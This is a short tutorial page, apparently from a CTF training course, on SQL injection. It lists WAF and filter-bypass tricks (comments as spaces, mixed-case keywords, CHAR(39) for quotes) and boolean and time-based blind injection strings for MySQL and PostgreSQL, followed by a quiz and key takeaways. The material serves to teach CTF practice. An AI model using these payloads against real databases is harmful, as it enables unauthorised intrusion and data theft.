SQL Injection in CTFs

intermediate35 minWriteup

SQL injection techniques specific to CTF challenges

Learning Objectives

  • Identify SQL injection points
  • Bypass CTF-specific filters
  • Extract flags from databases
  • Handle unusual database schemas

SQL Injection in CTFs goes beyond the basics. You will face WAF bypasses, filter evasion, and creative exploitation.

CTF SQLi challenges often have filters. Know multiple ways to achieve the same result!

Filter Bypasses

sql
1-- Space filter bypasses
2/**/            -- Comment as space
3+               -- Plus sign
4%09             -- Tab
5 
6-- Keyword filter bypasses
71' UnIoN SeLeCt 1,2,3--  -- Case variation
8 
9-- Quote bypass:
10CHAR(39)        -- Single quote in MySQL

Blind SQLi

sql
1-- Boolean-based blind
21' AND 1=1--    (normal response)
31' AND 1=2--    (different response)
4 
5-- Time-based blind
61' AND SLEEP(5)--                    -- MySQL
71' AND pg_sleep(5)--                 -- PostgreSQL

Knowledge Check

Quick Quiz
Question 1 of 1

How do you bypass a space filter in SQL injection?

Key Takeaways

  • /**/ comments replace spaces in most SQL
  • Case variation (SeLeCt) bypasses simple filters
  • CHAR() function avoids quote filters